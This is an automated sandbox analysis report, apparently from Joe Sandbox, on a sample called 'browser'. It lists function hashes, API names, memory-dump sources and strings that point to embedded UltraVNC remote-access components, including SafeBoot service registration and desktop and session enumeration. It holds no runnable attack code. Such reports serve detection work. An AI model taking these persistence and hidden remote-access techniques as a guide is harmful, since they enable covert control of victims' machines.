Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
Yara matches
Similarity
• API ID: Desktop$CloseEnumFindInfoMessageOpenParametersPostSystemVersionWindowWindows
• String ID: Screen-saver$WindowsScreenSaverClass$vncdesktop.cpp : KillScreenSaver...$vncdesktop.cpp : Killing ScreenSaver
• API String ID: 1547096108-1130181218
• Opcode ID: 0218681f0ca0f0cb8045d3d881905bd2119dca5bb8d2230a423cfe654c101359
• Instruction ID: da4cad5a33ee1ac9c2ab281c1bf08598c8fbaf47b7aa659d3a5471f0b4d2029d
• Opcode Fuzzy Hash: 0218681f0ca0f0cb8045d3d881905bd2119dca5bb8d2230a423cfe654c101359
• Instruction Fuzzy Hash: E1312F25A18A42C2FBA0DF51E861BB93360FF9574EF845131DE8D82795DEBCE109C750
APIs
Memory Dump Source
• Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
• Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
Yara matches
Similarity
• API ID: CriticalSection$CountEnterLeaveTick
• String ID:
• API String ID: 1056156058-0
• Opcode ID: 4e1fcf1f9d5970b8c335a6cd4b3d0a08090c87295cd844a4afdb87dd54e77e75
• Instruction ID: 70e791335c969e7394523ff03782b79326751cbf130749b5fa87e108b551db95
• Opcode Fuzzy Hash: 4e1fcf1f9d5970b8c335a6cd4b3d0a08090c87295cd844a4afdb87dd54e77e75
• Instruction Fuzzy Hash: 79D13836A09B8689EB50CF29E4402A877E4FB55B8EF404136DE8C87B68DFBCE451C754
APIs
Memory Dump Source
• Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
• Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
Yara matches
Similarity
• API ID: Combine$DataDeleteObjectRegion$free
• String ID:
• API String ID: 1378972593-0
• Opcode ID: cb15224673a3dfde0a5a84031da156aebc3bdcfdfc834712c68d2b408893385e
• Instruction ID: 68863198c7c467dd25204c55b041d1d10d08fa9de6faab76fd110d0deaa7d52b
• Opcode Fuzzy Hash: cb15224673a3dfde0a5a84031da156aebc3bdcfdfc834712c68d2b408893385e
• Instruction Fuzzy Hash: CF71A0B660468286EB50CF1AE4405AEBBB0FB49BD9B448032DF8D83754CF7DD591CB40
APIs
Memory Dump Source
• Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
• Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
Yara matches
Similarity
• API ID: DeleteObjectfree$CombineCriticalSection$CreateEnterLeaveRect
• String ID:
• API String ID: 707770685-0
• Opcode ID: e8ce359a573d540e0fad56669d64a20bc3cc88b06a8798c1e7988a6509252d61
• Instruction ID: 170a4991279d50e0cec4cf1a62cf87c7d60cfbb11bc7bc1ffd13023b8365289f
• Opcode Fuzzy Hash: e8ce359a573d540e0fad56669d64a20bc3cc88b06a8798c1e7988a6509252d61
• Instruction Fuzzy Hash: BA416026608A4286D750EF2AE8842A97770FBC9BDAF540231EF9E837A5CF7CD505C700
APIs
Memory Dump Source
• Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
• Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
Yara matches
Similarity
• API ID: Global$Free$Unlock$Lock$Allocfree
• String ID:
• API String ID: 2417228145-0
• Opcode ID: 83e6b6226f67f1017ea51708f5668e2a6f5a10fa7ee1f8b094fae28aff0d63d9
• Instruction ID: bf0d613d6d526e6894703e9290390fb1eb0f1751f52be46cd7acb157253599aa
• Opcode Fuzzy Hash: 83e6b6226f67f1017ea51708f5668e2a6f5a10fa7ee1f8b094fae28aff0d63d9
• Instruction Fuzzy Hash: BA51F43A604B4285DB90CF26E4802E977B0FB98F99F094436CE9D87768DFB8D484D750
APIs
Memory Dump Source
• Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
• Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
Yara matches
Similarity
• API ID: Combine$DeleteObjectfree$CreateRect
• String ID:
• API String ID: 3143477926-0
• Opcode ID: 0a56b58438f5393381c87e283caa4a4dd7c9b87ade4efda876708c0d747ae0c3
• Instruction ID: 0b28ee88e6be46fe703bd637441a8a6d2569dec1fc71971beb511c362e6d6e45
• Opcode Fuzzy Hash: 0a56b58438f5393381c87e283caa4a4dd7c9b87ade4efda876708c0d747ae0c3
• Instruction Fuzzy Hash: 04413C72608A8281DB90DF16E8944AAB730FB86BDAF405132EF9E87768DF7CD545C740
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Similarity
                                                                            • API ID: Close$DesktopHandle$CriticalInputLeaveOpenSection
                                                                            • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                            • API String ID: 4065787043-3977938048
                                                                            Similarity
                                                                            • API ID: Desktop$Thread$getpeernameinet_ntoamalloc$CloseCurrentDialogInputOpenParam
                                                                            • String ID: <unavailable>$Default
                                                                            • API String ID: 424836046-797050109
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: WTSEnumerateProcessesA$WTSFreeMemory$winlogon.exe$wtsapi32
                                                                            • API String ID: 145871493-4162899161
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: Console$WTSEnumerateSessionsA$WTSFreeMemory$wtsapi32
                                                                            • API String ID: 145871493-4083478734
                                                                            Similarity
                                                                            • API ID: Library$FileLoadModuleName$AddressFreeProc_errno_invalid_parameter_noinfo
                                                                            • String ID: LOGFAILED$LOGLOGON$\logging.dll$vncclient.cpp : authentication failed
                                                                            • API String ID: 2822070703-2230024269
                                                                            Similarity
                                                                            • API ID: Desktop$CloseOpenThread$CurrentInformationInputObjectUser
                                                                            • String ID: vncservice.cpp : OpenInputdesktop2 $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : OpenInputdesktop2 named$vncservice.cpp : SelectDesktop $vncservice.cpp : SelectDesktop failed to close desktop
                                                                            • API String ID: 82840795-1493190668
                                                                            Similarity
                                                                            • API ID: CriticalInitializeSection$AddressProc$LibraryLoad
                                                                            • String ID: GetPerTcpConnectionEStats$Iphlpapi.dll$SetPerTcpConnectionEStats$vsocket.cpp : VSocket() m_pDSMPlugin = NULL
                                                                            • API String ID: 3015439405-2946900448
                                                                            Similarity
                                                                            • API ID: free$_errno$EnvironmentVariable__wtomb_environ_invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 101574016-0
                                                                            Similarity
                                                                            • API ID: File$AttributesTime$BuffersCloseCountDeleteFlushHandleMoveSystemTick
                                                                            • String ID:
                                                                            • API String ID: 2697342021-0
                                                                            • Opcode ID: 3cdbb3c81f952b70d1ae05dd08e12069270f470a0136faf74d642e1c54183f65
                                                                            • Instruction ID: e8efcb3c28b56fc2feeffc863e2a554b893ffb11fea51a140ab6681448474374
                                                                            • Opcode Fuzzy Hash: 3cdbb3c81f952b70d1ae05dd08e12069270f470a0136faf74d642e1c54183f65
                                                                            • Instruction Fuzzy Hash: 08816726A08A8195EB90DF7094543EC3360EB55BAEF480235DFAD8B7DACFB8D159C314
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _errno$FullNamePathfree$ErrorLast_invalid_parameter_noinfocalloc
                                                                            • String ID:
                                                                            • API String ID: 3219262609-0
                                                                            • Opcode ID: bfbee9e4b5986560eceb10190c14978969bf0a457ba4f53162cbca2fe3e34832
                                                                            • Instruction ID: 92a0f2953ea6b55e88d84c37c1a21c6fffb29f9056dc2988940577b6ef89c611
                                                                            • Opcode Fuzzy Hash: bfbee9e4b5986560eceb10190c14978969bf0a457ba4f53162cbca2fe3e34832
                                                                            • Instruction Fuzzy Hash: 80317250E0C65285FAD5AE515D502BB21B0AF45BDEF584A31EFDEC7BC6DEECA4408600
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$AddressProc$Initialize$FileHandleLibraryLoadModule$CountCreateEnterErrorLastLeaveMappingOpenSemaphoreTickView
                                                                            • String ID: ChangeWindowMessageFilter$GetCursorInfo$user32.dll
                                                                            • API String ID: 173432231-678763868
                                                                            • Opcode ID: faf61d6d44ca246d6e556e1dfbdb385b5274f0d62226512dde9a94f323da9ec3
                                                                            • Instruction ID: 2be2d711af2c52a38b4069e9330e3a98144c9c63d784d95fc7df9c0d74cad56f
                                                                            • Opcode Fuzzy Hash: faf61d6d44ca246d6e556e1dfbdb385b5274f0d62226512dde9a94f323da9ec3
                                                                            • Instruction Fuzzy Hash: 9D41F831619B82A2E7489F24E9802E873B8FB45759F504136DBED837A4DFB9A4B5C300
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: LANMANNT$LANSECNT$ProductType$SERVERNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                            • API String ID: 3677997916-356703426
                                                                            • Opcode ID: 88216def6c21df696fe551fc804dfdd3315c8a7ded965229e51908db5a4eccae
                                                                            • Instruction ID: 2664681306b093cd5bf0372cf2a26628a3ca833dc101733dce626995e2e3e87c
                                                                            • Opcode Fuzzy Hash: 88216def6c21df696fe551fc804dfdd3315c8a7ded965229e51908db5a4eccae
                                                                            • Instruction Fuzzy Hash: F7412C32A1864381EBA08F20E4953AA72B0FB5574EF501132DF8DC7799EFBCD5158B44
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: CurrentType$Multiprocessor Checked$Multiprocessor Free$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Uniprocessor Checked$Uniprocessor Free
                                                                            • API String ID: 3677997916-1370392681
                                                                            • Opcode ID: 127efd2f4bb2d730ad2ffcadb57483ca5e65c2607e8512af785212c1471c3a0c
                                                                            • Instruction ID: b4f8c05ecca2524c8b354584b3a4f97a42c662c9460921c4e90d0e097eae4d20
                                                                            • Opcode Fuzzy Hash: 127efd2f4bb2d730ad2ffcadb57483ca5e65c2607e8512af785212c1471c3a0c
                                                                            • Instruction Fuzzy Hash: E3312B71A18A4385EA908F21E4843AA3374FB4978EF801132DFCDC67D9EFADD1058B40
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Create$BitmapCompatibleDeleteErrorLastObjectSection
                                                                            • String ID: vncdesktop.cpp : attempting to enable DIBsection blits$vncdesktop.cpp : enabled fast DIBsection blits OK$vncdesktop.cpp : enabled slow blits OK$vncdesktop.cpp : failed to build DIB section - reverting to slow blits$vncdesktop.cpp : failed to create memory bitmap(%d)
                                                                            • API String ID: 554953491-3667255696
                                                                            • Opcode ID: 2412a222e5f925d2ec09e0f324b69aa0f7fbd9fb7eb1a0c9a7fdb40c2cf1af0a
                                                                            • Instruction ID: e8642ffd78adcd833d5c9ac0a954c8b9ce628056cb4f42fc09a625adeb6a0e05
                                                                            • Opcode Fuzzy Hash: 2412a222e5f925d2ec09e0f324b69aa0f7fbd9fb7eb1a0c9a7fdb40c2cf1af0a
                                                                            • Instruction Fuzzy Hash: 5C313435A08A8785EB40DFA0E8805A93370FB45B4DF880432DE8D97B59EFBCE105C790
                                                                            APIs
                                                                            Strings
                                                                            • vncdesktopsink.cpp : initwindowthread already closed , xrefs: 00007FF6C2BB3246
                                                                            • vncdesktopsink.cpp : ~vncDesktop::Tell initwindowthread to close , xrefs: 00007FF6C2BB319A
                                                                            • vncdesktopsink.cpp : ~vncDesktop:: iniwindowthread proper closed , xrefs: 00007FF6C2BB321D
                                                                            • vncdesktopsink.cpp : ~vncDesktop::ERROR: messageloop blocked , xrefs: 00007FF6C2BB31DE
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandleThread$MessageObjectPostSingleTerminateWait
                                                                            • String ID: vncdesktopsink.cpp : initwindowthread already closed $vncdesktopsink.cpp : ~vncDesktop:: iniwindowthread proper closed $vncdesktopsink.cpp : ~vncDesktop::ERROR: messageloop blocked $vncdesktopsink.cpp : ~vncDesktop::Tell initwindowthread to close
                                                                            • API String ID: 803186428-2751095142
                                                                            • Opcode ID: ff4a8dadbb3d1f80123651424f61364fee41c37e370f197b6d587ed49a2076d2
                                                                            • Instruction ID: e56b167d7d0a290d91ccd64f967a7e23cc2caa09cd87988cbbe98f23b56946b4
                                                                            • Opcode Fuzzy Hash: ff4a8dadbb3d1f80123651424f61364fee41c37e370f197b6d587ed49a2076d2
                                                                            • Instruction Fuzzy Hash: 9A214D26A185C282E3409F65D4946F92369FF8970EF880832CE8EAA365CFBCA445C250
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseCreateValue_errno_invalid_parameter_noinfo_snprintf
                                                                            • String ID: ?$Network$SYSTEM\CurrentControlSet\Control\SafeBoot\%s\%s$Service$uvnc_service
                                                                            • API String ID: 913464532-2910635102
                                                                            • Opcode ID: 1bf795a48dcafc41ba0ceb8bae0d18797e802051582379eab5386516ec84cd5c
                                                                            • Instruction ID: 448b36803d8b7a6256cb44e834c47597f7d912f61c6497eccb546c345a481108
                                                                            • Opcode Fuzzy Hash: 1bf795a48dcafc41ba0ceb8bae0d18797e802051582379eab5386516ec84cd5c
                                                                            • Instruction Fuzzy Hash: 5B214A71A18A8282EBA0DF50F4457AA7360FB8535DF800135EBCC87B68DFBDD1198B40
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF6C2C45D15), ref: 00007FF6C2C45A72
                                                                            • malloc.LIBCMT ref: 00007FF6C2C45ADB
                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF6C2C45D15), ref: 00007FF6C2C45B0F
                                                                            • LCMapStringW.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF6C2C45D15), ref: 00007FF6C2C45B36
                                                                            • LCMapStringW.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF6C2C45D15), ref: 00007FF6C2C45B7E
                                                                            • malloc.LIBCMT ref: 00007FF6C2C45BDB
                                                                              • Part of subcall function 00007FF6C2C38C34: _FF_MSGBANNER.LIBCMT ref: 00007FF6C2C38C64
                                                                              • Part of subcall function 00007FF6C2C38C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF6C2C4329C,?,?,?,00007FF6C2C47749,?,?,?,00007FF6C2C477F3), ref: 00007FF6C2C38C89
                                                                              • Part of subcall function 00007FF6C2C38C34: _callnewh.LIBCMT ref: 00007FF6C2C38CA2
                                                                              • Part of subcall function 00007FF6C2C38C34: _errno.LIBCMT ref: 00007FF6C2C38CAD
                                                                              • Part of subcall function 00007FF6C2C38C34: _errno.LIBCMT ref: 00007FF6C2C38CB8
                                                                            • LCMapStringW.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF6C2C45D15), ref: 00007FF6C2C45C10
                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF6C2C45D15), ref: 00007FF6C2C45C50
                                                                            • free.LIBCMT ref: 00007FF6C2C45C64
                                                                            • free.LIBCMT ref: 00007FF6C2C45C75
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ByteCharMultiStringWide$_errnofreemalloc$AllocHeap_callnewh
                                                                            • String ID:
                                                                            • API String ID: 1080698880-0
                                                                            • Opcode ID: b5a887be6137e653958006011188746c2f8056e99f6c4bc23332a32471009a2b
                                                                            • Instruction ID: 1ca021172a564384a22a319441a60aa00c23a0e262ae54580c8dbfce5714b649
                                                                            • Opcode Fuzzy Hash: b5a887be6137e653958006011188746c2f8056e99f6c4bc23332a32471009a2b
                                                                            • Instruction Fuzzy Hash: 0B81A132A08B4286EBA48F25D88017A76B1FB58BE9F144636DF9D83BD4DFBCD5058700
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                             • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$Time$CloseDesktop$BuffersCountCriticalDeleteFlushHandleInputLeaveOpenSectionSystemTick
                                                                            • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                            • API String ID: 744660428-3977938048
                                                                            • Opcode ID: fed645862cd38dbadc558167132c5494320c5b0844e94726f2647533ca8cab21
                                                                            • Instruction ID: ed41703a626b3b70477de1e408876c62e672952b70244af7c8d6eb1f6ff1ff59
                                                                            • Opcode Fuzzy Hash: fed645862cd38dbadc558167132c5494320c5b0844e94726f2647533ca8cab21
                                                                            • Instruction Fuzzy Hash: 82D16E22A086C1C5EB618F25C4587FE7BA1EB86B8DF194171CE8C8B7A5CFB9E445C700
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                             • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$DesktopLeave$CloseCountEnterInputOpenRevertSelfTickTimetime
                                                                            • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                            • API String ID: 2523754900-3977938048
